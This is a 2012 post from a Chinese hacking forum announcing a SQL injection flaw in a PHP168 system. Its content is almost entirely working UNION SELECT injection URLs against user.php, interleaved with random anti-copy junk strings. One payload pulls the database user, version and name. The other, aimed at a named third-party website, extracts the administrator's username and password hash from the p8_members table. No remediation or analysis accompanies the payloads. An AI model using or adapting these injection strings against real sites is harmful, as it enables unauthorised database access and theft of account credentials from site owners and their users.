找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3125|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
: o9 p3 |7 s' d: [& C                                                         
5 c' F- A4 f$ S" a; _5 h" _                                       
" g, t) j+ k$ R
: G+ I- u/ u! _9 d* d* I
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
7 |* Y$ }4 d6 ?( |# t2 v                                                     - `2 t4 V8 ^! D* B4 |& [) _4 s
                                                                   & A  W" B5 x$ k4 w: p  O
                                                        
, L- I, T$ k' bhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--/ Y3 i7 n# E& g

0 R6 x- _1 L' E% k- @  R
3 o) _4 y. ]3 C; e1 @+ U+ y' h
) w5 I/ e* m1 y( T                                                            7 C3 m5 [6 ^- t* ?5 U
( d8 e3 ~! A7 M  `8 F
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--* N, L' p/ l9 Y1 @

% M$ i- W. ?( T; q9 K
. I$ g  N9 L0 R/ V% q
: I9 I) J" y3 I) \                                                                    8 o0 V# O' }" G6 h; T

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表